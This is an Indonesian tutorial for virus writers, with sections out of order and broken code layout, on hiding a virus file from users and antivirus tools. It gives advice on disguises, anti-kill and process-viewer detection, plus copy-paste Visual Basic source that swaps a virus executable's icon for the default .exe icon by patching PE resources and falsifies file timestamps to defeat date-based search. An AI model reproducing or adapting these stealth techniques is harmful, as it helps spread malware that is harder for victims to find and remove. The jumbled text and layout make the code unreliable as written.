stime.wYear = tahun stime.wMonth = bulan stime.wDay = hari stime.wHour = Hour(Time) stime.wMinute = Minute(Time) stime.wSecond = Second(Time)
rval = SystemTimeToFileTime(stime, ctime) rval = LocalFileTimeToFileTime(ctime, ctime)
End If
If modif Then
rval = FileTimeToLocalFileTime(mtime, mtime) rval = FileTimeToSystemTime(mtime, stime)
stime.wYear = tahun stime.wMonth = bulan stime.wDay = hari
stime.wHour = Hour(Time) stime.wMinute = Minute(Time) stime.wSecond = Second(Time)
rval = SystemTimeToFileTime(stime, mtime) rval = LocalFileTimeToFileTime(mtime, mtime)
End If
If acces Then
rval = FileTimeToLocalFileTime(latime, latime) rval = FileTimeToSystemTime(latime, stime)
stime.wYear = tahun stime.wMonth = bulan stime.wDay = hari stime.wHour = Hour(Time) stime.wMinute = Minute(Time) stime.wSecond = Second(Time)
rval = SystemTimeToFileTime(stime, latime) rval = LocalFileTimeToFileTime(latime, latime)
End If
rval = SetFileTime(hfile, ctime, latime, mtime) End If
rval = CloseHandle(hfile) End Sub
---------------------------- -Cut disini & Start Copy-Paste dari sini------------------------- -
Prosedur ubahtanggal akan merubah date dari file virus, dengan parameter hari, bulan dan tahun sesuai dengan yang kita inginkan. Parameter creat, modif dan acces menunjukkan date atau time mana yang akan diubah, Sebagai contoh bila acces bernilai True dan lainnya bernilai False maka hanya date dan time acces saja yang akan diubah.
$> End...
Karena keterbatasan tempat dan waktu maka saya hanya bisa membeberkan 2 teknik saja yang saya kira dapat digunakan untuk mempersulit User dalam mencari File Induk dari Virus. Saya ingin memohon maaf apabila ada ekurangan atau pernyataan yang menyinggung pembaca.
$ Greetz...
>Myztx @ Myztx Soft. House, Hellspawn, Brontok Creator, Tomero, MyHeart Creator, Kantuk Creator, n The other Vx3rs.
>All member of Mail-list : EcHo, Jasakom, Yogyafree, ITCenter, Virologi, Balihack, Informatics_01, ProgrammerVB n the others.
>Spyro, Vaganci, Yanto, n All my Friends at IA01 [2005], IA07 [2004] @ GunaDarma University, Depok.
>marskarthik@angelfire.com, (Naveed) neenojee@hotmail.com.
>Sites : VbBego.com, Virologi.info, Vaksin.com, Planet-Source-Code.com n the others.
$ Contact...
>Saran, Kritik, Caci-maki, Dll diharapkan dan ditujukan pada alamat email :
Penulis tidak bertanggung jawab atas kerugian yang ditimbulkan atas penggunaan artikel ini (Use at Your Own Risk).
$> Start...
Mungkin sebagian (Atau seluruhnya) Vx3r (Pembuat Virus) pasti menemukan suatu permasalahan dalam membuat Virusnya agar susah dihapus atau meminimalisir pendeteksian oleh User ataupun Anti Virus.
Bagaimana sih cara-cara Vx3r itu menyembunyikan Virusnya di komputer korban? Ada beberapa cara yang klasik dan sangat sering dilakukan, Seperti:
1. Merubah nama File Virus menjadi (mirip) File system Windows, contoh RunDll32.exe, Winsys32.exe,dll
2. Menempatkan File Virus di Folder Hidden atau di Folder System Windows.
3. Menghalangi Akses ke Task Manager maupun Tool-tool yang dapat menampilkan proses yang sedang berlangsung. Hal ini lumrah karena virus ingin eksistensinya dipertahankan.
4. Menggunakan nama file yang random atau acak.
5. Menggunakan Ikon yang umum seperti MS-Word, Folder, Setup program, dll.
6. Memblok fasilitas Search.
7. Dan lainnya.
Lalu apa saja kelemahannya? Untuk penggunaan Ikon yang umum hal ini sangat fatal, karena User dapat membedakan antara ikon Default File *.Exe dengan ikon yang dipakai oleh Virus. Sebagai contoh apabila si Virus memakai Ikon MS- Word maka akan terjadi suatu kejanggalan, "Ikonnya Word kok ekstensinya Exe?".
Contoh lagi kasus penggunaan nama file random atau acak. Pada hal ini diperlukan suatu penyimpanan dari nama file acak itu, karena pada Trigger Virus jalan dia akan mencari file yang dimaksud. Pemyimpanan nya pun berupa file ataupun key di registry. Kedua teknik penyimpanan tersebut sama baiknya apabila dilengkapi oleh teknik Enkripsi. Pada suatu Virus yang pernah saya temukan dan analisa, Kangen.E telah menggunakan nama acak dan penyimpanan di suatu file *.sys. Dan file tersebut dibiarkan apa adanya tanpa perlindungan apapun terhadap isinya. Hal ini memudahkan dalam melacak nama trigger virus tsb.
Sebenarnya langkah apa yang harus diambil agar virus kita tak mudah terlacak oleh User? Menurut pandangan saya ada beberapa poin yang sangat penting:
1. Lakukan teknik penggantian Ikon secara langsung (Ekstrak dan ganti), bukan mengandalkan ikon default.
2. Penggantian Filetime maupun FileDate dan ukuran pada file Virus agar tidak mudah ditemukan dengan Search.
3. Gunakan API-Hook dalam melacak tool Proses Viewer, jangan mengandalkan
windows Caption karena sudah banyak caption lagi.
tool yang tidak memakai window
4. Jika memungkinkan jangan me-launch instan virus dengan cara "shell", karena hal ini dapat berakibat Proses Virus menjadi Parent and Child. Bila sang parent mati maka si child pun akan ikut mati.
5. Selalu gunakan instan virus lain untuk saling melacak keberadaan virus (Anti- Kill process) sehingga virus memungkinkan untuk tetap eksis.
$> How to...?
Saya menggunakan Bahasa Pemograman Visual Basic 6.0 dalam mencoba teknik stealth (yang menurut saya) agak baik Serta beberapa referensi Source Code maupun artikel dari Internet.
Teknik ini juga saya coba pada Virus Diary.Exe (V 1.3-1.5) dengan beberapa perubahan.
1. Penggantian ikon
Jika anda pernah menemukan suatu software pengekstrak atau pengganti ikon (bahkan keduanya) suatu file, maka kurang lebih hal ini bisa juga diimplementasikan di Virus :D. Contoh algoritmanya :
START EXECUTION
|
Copy myself.exe to destination path
|
Search file yang akan diekstrak ikonnya
|
Ekstrak ikonnya, save to destination path
|
Change myself.exe dengan file ikon (*.Ico) yang sudah di ekstrak
|
Hapus File ikon apabila sudah tidak digunakan
|
END EXECUTION
Saya menggunakan file Shell32.Dll sebagai file yang akan diekstrak Ikonnya, dalam hal ini saya akan memilih ikon Default file *.exe (yang berwarna kotak putih-biru :P). Kira-kira begini source codenya :
(Diperlukan Objek PictureBox dalam Form)
---------------------------- -Cut disini & Start Copy-Paste dari sini------------------------- -
Sub cariikon(pathcari As String, pathekstrak As String, jenisikon As String, pic2 As PictureBox)
Dim poin As Long poin = 1
Dim i As Long Dim buf(1000) As Double Dim jum As Integer jum = 0
Dim jikon As Long jikon = 0
Dim init As String
init = Chr$(0) & Chr$(0) & Chr$(1) & Chr$(0) & Chr$(1) & Chr$(0) & Chr$(32) & Chr$(32) & Chr$(0) & Chr$(0) & Chr$(0) & Chr$(0) & Chr$(0) & Chr$(0) & Chr$(168) & Chr$(8) & Chr$(0) & Chr$(0) & Chr$(22) & Chr$(0) & Chr$(0) & Chr$(0)
Dim strbaca As String strbaca = Space(2238) Dim fildat As String Dim new_dic As String Dim rs As String
rs = Chr$(0) & Chr$(0) & Chr$(0) & " " & Chr$(0) & Chr$(0) & Chr$(0) & "@" Dim buff As Double
buff = 1024 ^ 2
Open pathcari For Binary As #1 If LOF(1) > buff Then
fildat = Space(buff) Else
fildat = Space(LOF(1)) End If
balik:
If poin > LOF(1) Then GoTo tulis
End If
Get #1, poin, fildat
i = 1
carilagi:
DoEvents
i = InStr(i + 1, fildat, "(" & rs) If i > 0 Then
'lst.Add "#" & lst.Count & "#", i + poin - 1 buf(jum) = i + poin - 1
jum = jum + 1
End If
If i + Len(rs) > buff Or i = 0 Then poin = poin + buff - Len("(" & rs) - 1 GoTo balik
Else
GoTo carilagi End If
tulis:
Close
Open pathcari For Binary As #1 For poin = 0 To jum - 1 DoEvents
If Right(pathekstrak, 1) <> "\" Then pathekstrak = pathekstrak & "\" End If
If poin <> jenisikon Then GoTo lsg
Open pathekstrak & "Ikon.ico" For Output As #2: Close #2 Open pathekstrak & "Ikon.ico" For Binary As #2
'i = lst.Item("#" & poin & "#") i = buf(poin)
Get #1, i, strbaca
Put #2, 1, init & strbaca & Chr$(255) Close #2
If ikon(pathekstrak & "Ikon.ico", pic2) = 0 Then Kill pathekstrak & "Ikon.ico"
End If
DoEvents
lsg: Next poin Close #1
Close
End Sub
sub ikon(path As String, pic As PictureBox) On Error GoTo ero
pic.Picture = LoadPicture(path) ikon = 1
Exit Function ero:
ikon = 0
Exit Function End Function
---------------------------- -Cut disini & Start Copy-Paste dari Sini------------------------- -
Prosedur cari ikon akan mencari file yang akan diekstrak ikonnya berdasarkan index ikon tersebut. Ikon yang akan dihasilkan masih berukuran 16X16, tetapi hal itu sudah cukup untuk mengelabui User. Perlu diingat bahwa index ikon file *.Exe dalam shell32.Dll untuk tiap versi Windows adalah berbeda. Terutama untuk Windows 9x dan Windows 2k/2003/XP/NT.
Lalu bagaimana kita menukar atau change ikon virus kita dengan file ikon yang sudah diekstrak tsb?
(Referensi Source Code dari Internet, Author :Naveed, neenojee@hotmail.com)
1st. Module:
---------------------------- -Cut disini & Start Copy-Paste dari sini------------------------- -
Option Explicit Type DIB_HEADER
Size
Width
Height
Planes
Bitcount
Reserved
ImageSize
As Long
As Long
As Long
As Integer
As Integer
As Long
As Long
End Type
Type ICON_DIR_ENTRY bWidth
bHeight
bColorCount bReserved
wPlanes
wBitCount
dwBytesInRes dwImageOffset
End Type
Type ICON_DIR Reserved
Type
Count
End Type
Type DIB_BITS Bits()
End Type
As Byte
As Byte
As Byte
As Byte
As Integer
As Integer
As Long
As Long
As Integer
As Integer
As Integer
As Byte
Public Enum Errors FILE_CREATE_FAILED = 1000 FILE_READ_FAILED INVALID_PE_SIGNATURE INVALID_ICO NO_RESOURCE_TREE NO_ICON_BRANCH CANT_HACK_HEADERS
End Enum
Public Function ReplaceIcons(Source As String, Dest As String) As Long
Dim IcoDir As ICON_DIR Dim IcoDirEntry As ICON_DIR_ENTRY Dim tBits As DIB_BITS
Dim Icons() As IconDescriptor Dim lngRet As Long Dim BytesRead As Long Dim hSource As Long
Dim hDest As Long Dim ResTree As Long
hSource = CreateFile(Source, ByVal &H80000000, 0, ByVal 0&, 3, 0, ByVal 0) If hSource >= 0 Then
If Valid_ICO(hSource) Then SetFilePointer hSource, 0, 0, 0
ReadFile hSource, IcoDir, 6, BytesRead, ByVal 0& ReadFile hSource, IcoDirEntry, 16, BytesRead, ByVal 0& SetFilePointer hSource, IcoDirEntry.dwImageOffset, 0, 0 ReDim tBits.Bits(IcoDirEntry.dwBytesInRes) As Byte
ReadFile hSource, tBits.Bits(0), IcoDirEntry.dwBytesInRes, BytesRead, ByVal 0& CloseHandle hSource
hDest = CreateFile(Dest, ByVal (&H80000000 Or &H40000000), 0, ByVal 0&, 3, 0, ByVal 0)
If hDest >= 0 Then If Valid_PE(hDest) Then
ResTree = GetResTreeOffset(hDest)
If ResTree > 308 Then ' Sanity check
lngRet = GetIconOffsets(hDest, ResTree, Icons)
SetFilePointer hDest, Icons(1).Offset, 0, 0
WriteFile hDest, tBits.Bits(0), UBound(tBits.Bits), BytesRead, ByVal 0&
Else
CloseHandle hDest
End If
Else
CloseHandle hDest
End If
CloseHandle hDest
Else
End If
Else
CloseHandle hSource End If
Else
End If
ReplaceIcons = 0 Exit Function
End Function
Public Function Valid_ICO(hfile As Long) As Boolean
Dim tDir As ICON_DIR
Dim BytesRead As Long
If (hfile > 0) Then
ReadFile hfile, tDir, Len(tDir), BytesRead, ByVal 0&
If (tDir.Reserved = 0) And (tDir.Type = 1) And (tDir.Count > 0) Then
Valid_ICO = True
Else
Valid_ICO = False
End If
Else
Valid_ICO = False
End If
End Function
---------------------------- -Cut disini & Start Copy-Paste dari sini------------------------- -
2nd. Module
---------------------------- -Cut disini & Start Copy-Paste dari sini------------------------- -
Option Explicit
Public Type IMAGE_DOS_HEADER
Magic As Integer
cblp As Integer
cp As Integer
crlc As Integer
cparhdr As Integer
minalloc As Integer
maxalloc As Integer
ss As Integer
sp As Integer
csum As Integer
ip As Integer
cs As Integer
lfarlc As Integer
ovno As Integer
res(3) As Integer
oemid As Integer
oeminfo As Integer
res2(9) As Integer
lfanew As Long
End Type
Public Type IMAGE_FILE_HEADER
Machine
NumberOfSections TimeDateStamp PointerToSymbolTable NumberOfSymbols
As Integer
As Integer
As Long
As Long
As Lon
SizeOfOtionalHeader As Integer
Characteristics As Integer
End Type
Public Type IMAGE_DATA_DIRECTORY
DataRVA As Long
DataSize As Long
End Type
Public Type IMAGE_OPTIONAL_HEADER
Magic As Integer
MajorLinkVer As Byte
MinorLinkVer As Byte
CodeSize As Long
InitDataSize As Long
unInitDataSize As Long
EntryPoint As Long
CodeBase As Long
DataBase As Long
ImageBase As Long
SectionAlignment As Long
FileAlignment As Long
MajorOSVer As Integer
MinorOSVer As Integer
MajorImageVer As Integer
MinorImageVer As Integer
MajorSSVer As Integer
MinorSSVer As Integer
Win32Ver As Long
ImageSize As Long
HeaderSize As Long
Checksum As Long
Subsystem As Integer
DLLChars As Integer
StackRes As Long
StackCommit As Long
HeapReserve As Long
HeapCommit As Long
LoaderFlags As Long
RVAsAndSizes As Long
DataEntries(15) As IMAGE_DATA_DIRECTORY
End Type
Public Type IMAGE_SECTION_HEADER
SectionName(7) As Byte
Address As Long
VirtualAddress As Long
SizeOfData As Long
PData As Long
PReloc As Long
PLineNums As Long
RelocCount As Integer
LineCount As Integer
Characteristics As Long
End Type
Type IMAGE_RESOURCE_DIR
Characteristics As Long
TimeStamp As Long
MajorVersion As Integer
MinorVersion As Integer
NamedEntries As Integer
IDEntries As Integer
End Type
Type RESOURCE_DIR_ENTRY
Name As Long
Offset As Long
End Type
Type RESOURCE_DATA_ENTRY
Offset As Long
Size As Long
CodePage As Long
Reserved As Long
End Type
Public Type IconDescriptor
ID
Offset
Size
End Type
As Long
As Long
As Long
Public Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)
Public Declare Function CreateFile Lib "kernel32" Alias "CreateFileA" (ByVal lpFileName As String, ByVal dwDesiredAccess As Long, ByVal dwShareMode As Long, lpSecurityAttributes As Any, ByVal dwCreationDisposition As Long, ByVal dwFlagsAndAttributes As Long, ByVal hTemplateFile As Long) As Long
Public Declare Function ReadFile Lib "kernel32" (ByVal hfile As Long, lpBuffer As Any, ByVal nNumberOfBytesToRead As Long, lpNumberOfBytesRead As Long, lpOverlapped As Any) As Long
Public Declare Function WriteFile Lib "kernel32" (ByVal hfile As Long, lpBuffer As Any, ByVal nNumberOfBytesToWrite As Long, lpNumberOfBytesWritten As Long, lpOverlapped As Any) As Long
Public Declare Function SetFilePointer Lib "kernel32" (ByVal hfile As Long, ByVal lDistanceToMove As Long, lpDistanceToMoveHigh As Long, ByVal dwMoveMethod As Long) As Long
Public Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private SectionAlignment Private FileAlignment Private ResSectionRVA Private ResSectionOffset
As Long
As Long
As Long
As Long
Public Function Valid_PE(hfile As Long) As Boolean
Dim Buffer(12) As Byte
Dim lngBytesRead As Long
Dim tDosHeader As IMAGE_DOS_HEADER
If (hfile > 0) Then
ReadFile hfile, tDosHeader, ByVal Len(tDosHeader), lngBytesRead, ByVal 0& CopyMemory Buffer(0), tDosHeader.Magic, 2
If (Chr(Buffer(0)) & Chr(Buffer(1)) = "MZ") Then SetFilePointer hfile, tDosHeader.lfanew, 0, 0 ReadFile hfile, Buffer(0), 4, lngBytesRead, ByVal 0&
If (Chr(Buffer(0)) = "P") And (Chr(Buffer(1)) = "E") And (Buffer(2) = 0) And (Buffer(3) = 0) Then
Valid_PE = True Exit Function
End If
End If
End If
Valid_PE = False
End Function
Public Function GetResTreeOffset(hfile As Long) As Long On Error GoTo ErrHandler:
Dim tDos
Dim tFile
Dim tOptional Dim tSections() Dim BytesRead Dim intC
Dim TreeFound
As IMAGE_DOS_HEADER As IMAGE_FILE_HEADER As IMAGE_OPTIONAL_HEADER As IMAGE_SECTION_HEADER As Long
As Integer
As Boolean
TreeFound = False If (hfile > 0) Then
SetFilePointer hfile, 0, 0, 0
' Get the offset of the Image File Header
ReadFile hfile, tDos, Len(tDos), BytesRead, ByVal 0& SetFilePointer hfile, ByVal tDos.lfanew + 4, 0, 0
' Get the Image File Header and the Image Optional Header ReadFile hfile, tFile, Len(tFile), BytesRead, ByVal 0& ReadFile hfile, tOptional, Len(tOptional), BytesRead, ByVal 0&
' Get section headers
ReDim tSections(tFile.NumberOfSections - 1) As IMAGE_SECTION_HEADER ReadFile hfile, tSections(0), Len(tSections(0)) * tFile.NumberOfSections,
BytesRead, ByVal 0&
' Make sure there is a resource tree in this file If (tOptional.DataEntries(2).DataSize) Then
' Save section alignment and file alignment of image SectionAlignment = tOptional.SectionAlignment FileAlignment = tOptional.FileAlignment
' Determine which section contains the resource tree For intC = 0 To UBound(tSections)
If (tSections(intC).VirtualAddress <= tOptional.DataEntries(2).DataRVA) _ And ((tSections(intC).VirtualAddress + tSections(intC).SizeOfData) >
tOptional.DataEntries(2).DataRVA) Then TreeFound = True
' Save RVA and offset of resource section for future calculations ResSectionRVA = tSections(intC).VirtualAddress
ResSectionOffset = tSections(intC).PData
' Calculate the physical file offset of the resouce tree GetResTreeOffset = tSections(intC).PData +
(tOptional.DataEntries(2).DataRVA - tSections(intC).VirtualAddress) Exit For
End If
Next intC
If Not TreeFound Then GetResTreeOffset = -1
End If
Else
GetResTreeOffset = -1 End If
Else
GetResTreeOffset = -1 End If
Exit Function
ErrHandler:
End Function
Public Function GetIconOffsets(hfile As Long, TreeOffset As Long, Icons() As IconDescriptor) As Long
On Error GoTo ErrHandler:
Dim Root As IMAGE_RESOURCE_DIR ' Root node of resource tree
Dim L1Entries() As RESOURCE_DIR_ENTRY ' 1st level of directory entries
Dim L2Root() As IMAGE_RESOURCE_DIR ' Level 2 resource directories
Dim L2Entries() As RESOURCE_DIR_ENTRY ' 2nd level of directory entries
Dim L3Root() As IMAGE_RESOURCE_DIR ' Level 3 resource directories
Dim L3Entries() As RESOURCE_DIR_ENTRY ' 3rd level of directory entries
Dim DataEntries() As RESOURCE_DATA_ENTRY ' Resource data entries
Dim DIB As DIB_HEADER ' Descriptor for icon images
Dim iLvl1 As Integer ' Loop Counter (first level)
Dim iLvl2 As Integer ' Loop Counter (second level)
Dim iLvl3 As Integer ' Loop Counter (third level)
Dim Cursor As Long ' Temp val for setting file pointer
Dim BytesRead As Long ' For ReadFile()
Dim Count As Integer ' Number of icons found
If (hfile > 0) Then Count = 0
SetFilePointer hfile, ByVal TreeOffset, 0, 0
' Get the root node and begin navigating the resource tree ReadFile hfile, Root, Len(Root), BytesRead, ByVal 0 ReDim L2Root(Root.NamedEntries + Root.IDEntries) As IMAGE_RESOURCE_DIR ReDim L1Entries(Root.NamedEntries + Root.IDEntries) As RESOURCE_DIR_ENTRY
' Get first level child nodes
For iLvl1 = 1 To (Root.NamedEntries + Root.IDEntries)
SetFilePointer hfile, TreeOffset + 8 + (iLvl1 * 8), 0, 0 ReadFile hfile, L1Entries(iLvl1), 8, BytesRead, ByVal 0& If L1Entries(iLvl1).Name = 3 Then
' Jump to level 2 and get directory
' Strip high-order byte from offset CopyMemory Cursor, L1Entries(iLvl1).Offset, 3 Cursor = Cursor + TreeOffset SetFilePointer hfile, ByVal Cursor, 0, 0
ReadFile hfile, L2Root(iLvl1), 16, BytesRead, ByVal 0& ReDim L3Root(L2Root(iLvl1).NamedEntries + L2Root(iLvl1).IDEntries) As
IMAGE_RESOURCE_DIR
ReDim L2Entries(L2Root(iLvl1).IDEntries + L2Root(iLvl1).NamedEntries) As RESOURCE_DIR_ENTRY
For iLvl2 = 1 To (L2Root(iLvl1).IDEntries + L2Root(iLvl1).NamedEntries)
' Read second level child nodes CopyMemory Cursor, L1Entries(iLvl1).Offset, 3 Cursor = Cursor + TreeOffset
SetFilePointer hfile, Cursor + 8 + (iLvl2 * 8), 0, 0 ReadFile hfile, L2Entries(iLvl2), 8, BytesRead, ByVal 0&
' Jump to level 3 and get directory CopyMemory Cursor, L2Entries(iLvl2).Offset, 3 Cursor = Cursor + TreeOffset SetFilePointer hfile, ByVal Cursor, 0, 0
ReadFile hfile, L3Root(iLvl2), 16, BytesRead, ByVal 0& ReDim L3Entries(L3Root(iLvl2).NamedEntries + L3Root(iLvl2).IDEntries) As
RESOURCE_DIR_ENTRY
ReDim DataEntries(L3Root(iLvl2).NamedEntries + L3Root(iLvl2).IDEntries) As RESOURCE_DATA_ENTRY
For iLvl3 = 1 To (L3Root(iLvl2).NamedEntries + L3Root(iLvl2).IDEntries)
' Read third level child nodes CopyMemory Cursor, L2Entries(iLvl2).Offset, 3 Cursor = Cursor + TreeOffset
SetFilePointer hfile, (Cursor + 8 + (iLvl3 * 8)), 0, 0 ReadFile hfile, L3Entries(iLvl3), 8, BytesRead, ByVal 0&
' Jump to IMAGE_DATA_ENTRY and get RVA of IconDir structure SetFilePointer hfile, TreeOffset + (L3Entries(iLvl3).Offset), 0, 0 ReadFile hfile, DataEntries(iLvl3), 16, BytesRead, ByVal 0&
' Convert RVA of IconDir structure to file offset and store Count = Count + 1
ReDim Preserve Icons(Count) As IconDescriptor Icons(Count).Offset = RVA_to_Offset(DataEntries(iLvl3).Offset)
' Store ID of icon resource Icons(Count).ID = L2Entries(iLvl2).Name
' Store Size of icon resource SetFilePointer hfile, Icons(Count).Offset, 0, 0
ReadFile hfile, DIB, ByVal Len(DIB), BytesRead, ByVal 0& Icons(Count).Size = DIB.ImageSize + 40
Next iLvl3
Next iLvl2
End If
Next iLvl1
Else
Count = 0
End If
' Return the number of icons found GetIconOffsets = Count Exit Function
ErrHandler:
End Function
Public Function HackDirectories(hfile As Long, ResTree As Long, DIBOffset As Long, _ DIBAttrib As ICON_DIR_ENTRY) As Boolean
On Error GoTo ErrHandler:
Dim Cursor As Long
Dim Root As IMAGE_RESOURCE_DIR
Dim L1Entries() As RESOURCE_DIR_ENTRY
Dim L2Root() As IMAGE_RESOURCE_DIR
Dim L2Entries() As RESOURCE_DIR_ENTRY
' File pointer position
' Root node of res tree
' First-level child nodes
' Second-level root nodes
' Second-level child nodes
Dim L3Root() As IMAGE_RESOURCE_DIR ' Third-level root nodes
Dim L3Entries() As RESOURCE_DIR_ENTRY ' Third-level child nodes
Dim DataEntries() As RESOURCE_DATA_ENTRY ' IMAGE_RESOURCE_DATA_ENTRY structs
Dim IcoDir As ICON_DIR ' IconDirectory in EXE
Dim iLvl1 As Integer ' Loop Counter (first level)
Dim iLvl2 As Integer ' Loop Counter (second level)
Dim iLvl3 As Integer ' Loop Counter (third level)
Dim intC As Integer ' Loop Counter (general)
Dim BytesRead As Long ' Returned by Read/WriteFile API's
If (hfile >= 0) Then
' Convert DIBOffset to an RVA (needed for RESOURCE_DATA_ENTRY structures) DIBOffset = Offset_to_RVA(DIBOffset)
SetFilePointer hfile, ByVal ResTree, 0, 0 ReadFile hfile, Root, Len(Root), BytesRead, ByVal 0&
ReDim L1Entries(Root.NamedEntries + Root.IDEntries) As RESOURCE_DIR_ENTRY ReDim L2Root(Root.NamedEntries + Root.IDEntries) As IMAGE_RESOURCE_DIR
' Loop through first-level child nodes and find RT_GROUP_ICON branch For iLvl1 = 1 To (Root.NamedEntries + Root.IDEntries)
SetFilePointer hfile, ResTree + 8 + (iLvl1 * 8), 0, 0 ReadFile hfile, L1Entries(iLvl1), 8, BytesRead, ByVal 0& If L1Entries(iLvl1).Name = &HE Then
' RT_GROUP_ICON branch found CopyMemory Cursor, L1Entries(iLvl1).Offset, 3 Cursor = Cursor + ResTree SetFilePointer hfile, Cursor, 0, 0
' Read second-level directory
ReadFile hfile, L2Root(iLvl1), 16, BytesRead, ByVal 0& ReDim L2Entries(L2Root(iLvl1).NamedEntries + L2Root(iLvl1).IDEntries) As
RESOURCE_DIR_ENTRY
ReDim L3Root(L2Root(iLvl1).NamedEntries + L2Root(iLvl1).IDEntries) As IMAGE_RESOURCE_DIR
For iLvl2 = 1 To (L2Root(iLvl1).NamedEntries + L2Root(iLvl1).IDEntries) CopyMemory Cursor, L1Entries(iLvl1).Offset, 3
Cursor = Cursor + ResTree
SetFilePointer hfile, Cursor + 8 + (iLvl2 * 8), 0, 0 ReadFile hfile, L2Entries(iLvl2), 8, BytesRead, ByVal 0& CopyMemory Cursor, L2Entries(iLvl2).Offset, 3
Cursor = Cursor + ResTree SetFilePointer hfile, Cursor, 0, 0 ' Read thrid-level directory
ReadFile hfile, L3Root(iLvl2), 16, BytesRead, ByVal 0& ReDim L3Entries(L3Root(iLvl2).NamedEntries + L3Root(iLvl2).IDEntries) As
RESOURCE_DIR_ENTRY
For iLvl3 = 1 To (L3Root(iLvl2).NamedEntries + L3Root(iLvl2).IDEntries)
' Read third-level child nodes CopyMemory Cursor, L2Entries(iLvl2).Offset, 3 Cursor = Cursor + ResTree + 8 + (iLvl3 * 8) SetFilePointer hfile, Cursor, 0, 0
ReadFile hfile, L3Entries(iLvl3), 8, BytesRead, ByVal 0&
' Jump to RESOURCE_DATA_ENTRY CopyMemory Cursor, L3Entries(iLvl3).Offset, 3 Cursor = Cursor + ResTree SetFilePointer hfile, Cursor, 0, 0
ReDim Preserve DataEntries(iLvl3) As RESOURCE_DATA_ENTRY ReadFile hfile, DataEntries(iLvl3), 16, BytesRead, ByVal 0&
' Jump to and read ICON_DIR structure
Cursor = RVA_to_Offset(DataEntries(iLvl3).Offset) SetFilePointer hfile, Cursor, 0, 0 ReadFile hfile, IcoDir, 6, BytesRead, ByVal 0& For intC = 1 To IcoDir.Count
WriteFile hfile, DIBAttrib, Len(DIBAttrib) - 4, BytesRead, ByVal 0& SetFilePointer hfile, 2, 0, 1
Next intC
Next iLvl3
Next iLvl2
ElseIf L1Entries(iLvl1).Name = 3 Then CopyMemory Cursor, L1Entries(iLvl1).Offset, 3 Cursor = Cursor + ResTree SetFilePointer hfile, ByVal Cursor, 0, 0 ' Read second-level director
ReadFile hfile, L2Root(iLvl1), 16, BytesRead, ByVal 0& ReDim L2Entries(L2Root(iLvl1).NamedEntries + L2Root(iLvl1).IDEntries) As
RESOURCE_DIR_ENTRY
ReDim L3Root(L2Root(iLvl1).NamedEntries + L2Root(iLvl1).IDEntries) As IMAGE_RESOURCE_DIR
For iLvl2 = 1 To (L2Root(iLvl1).NamedEntries + L2Root(iLvl1).IDEntries) CopyMemory Cursor, L1Entries(iLvl1).Offset, 3
Cursor = Cursor + ResTree
SetFilePointer hfile, Cursor + 8 + (iLvl2 * 8), 0, 0 ReadFile hfile, L2Entries(iLvl2), 8, BytesRead, ByVal 0& CopyMemory Cursor, L2Entries(iLvl2).Offset, 3
Cursor = Cursor + ResTree SetFilePointer hfile, Cursor, 0, 0 ' Read thrid-level directory
ReadFile hfile, L3Root(iLvl2), 16, BytesRead, ByVal 0& ReDim L3Entries(L3Root(iLvl2).NamedEntries + L3Root(iLvl2).IDEntries) As
RESOURCE_DIR_ENTRY
For iLvl3 = 1 To (L3Root(iLvl2).NamedEntries + L3Root(iLvl2).IDEntries)
' Read third-level child nodes CopyMemory Cursor, L2Entries(iLvl2).Offset, 3 Cursor = Cursor + ResTree + 8 + (iLvl3 * 8) SetFilePointer hfile, Cursor, 0, 0
ReadFile hfile, L3Entries(iLvl3), 8, BytesRead, ByVal 0&
' Jump to and hack the RESOURCE_DATA_ENTRY Cursor = L3Entries(iLvl3).Offset + ResTree SetFilePointer hfile, Cursor, 0, 0 WriteFile hfile, DIBOffset, 4, BytesRead, ByVal 0&
WriteFile hfile, CLng(DIBAttrib.dwBytesInRes + 40), 4, BytesRead, ByVal
0&
Next iLvl3
Next iLvl2
End If
Next iLvl1
Else
HackDirectories = False Exit Function
End If
HackDirectories = True Exit Function
ErrHandler:
End Function
Private Function RVA_to_Offset(RVA As Long) As Long
On Error GoTo ErrHandler:
Dim TempOffset As Long ' Difference of RVA and start of section
TempOffset = RVA - ResSectionRVA
If (TempOffset >= 0) Then
' Calculate the file offset of the RVA
RVA_to_Offset = ResSectionOffset + TempOffset
Else
RVA_to_Offset = -1
End If
Exit Function
ErrHandler:
End Function
Private Function Offset_to_RVA(Offset As Long) As Long
On Error GoTo ErrHandler:
Dim TempOffset As Long ' Difference of Offset and start of section
' Get distance between offset and start of resource section TempOffset = Offset - ResSectionOffset
If TempOffset >= 0 Then
' Calculate RVA of the file offset Offset_to_RVA = ResSectionRVA + TempOffset
Else
Offset_to_RVA = -1 End If
Exit Function
ErrHandler:
End Function
---------------------------- -Cut disini & Start Copy-Paste dari sini------------------------- -
Prosedur ReplaceIcon (1st. Module) akan mengganti Ikon Virus kita dengan file *.Ico tsb (Source = Path file ikon, Dest = Path file yang akan diganti ikonnya), Ada beberapa kelemahan dalam penggantian Ikon ini. Pertama, bila Virus dikompress atau di-Pack dengan settingan untuk menghilangkan atau hanya megkompress resource dari File maka penggantian Ikon ini tidak bisa berjalan mulus. Kedua, untuk beberapa file yang akan dikestrak kadang-kadang ikon tidak berukuran 16X16, bahkan tidak bisa diekstrak sama sekali.
2. Penggantian Date dan Time File Virus
Field apakah yang paling sering digunakan dalam fasilitas Search suatu file di Windows? Waktu akses/modif/buat dari file.
Ambil contoh virus A.exe dibuat pada tanggal 1 Feb 2006, mulai menginfeksi komputer anda tanggal 2 Feb 2006. Maka yang harus anda lakukan dalam mencari file tsb dengan mengisikan field tanggal search dengan range 1 Feb 2006 sampai 2 Feb 2006.
Apa yang harus dilakukan? Kita harus rubah tanggal akes/modif/buat dari file Virus kita agar tidak (atau setidaknya mempersulit) User mencarinya. Berikut Source Code yang kira-kira dapat menggambarkan teknik tersebut :
(Referensi Source Code dari Internet, Author : marskarthik@angelfire.com)
---------------------------- -Cut disini & Start Copy-Paste dari sini------------------------- -
Option Explicit
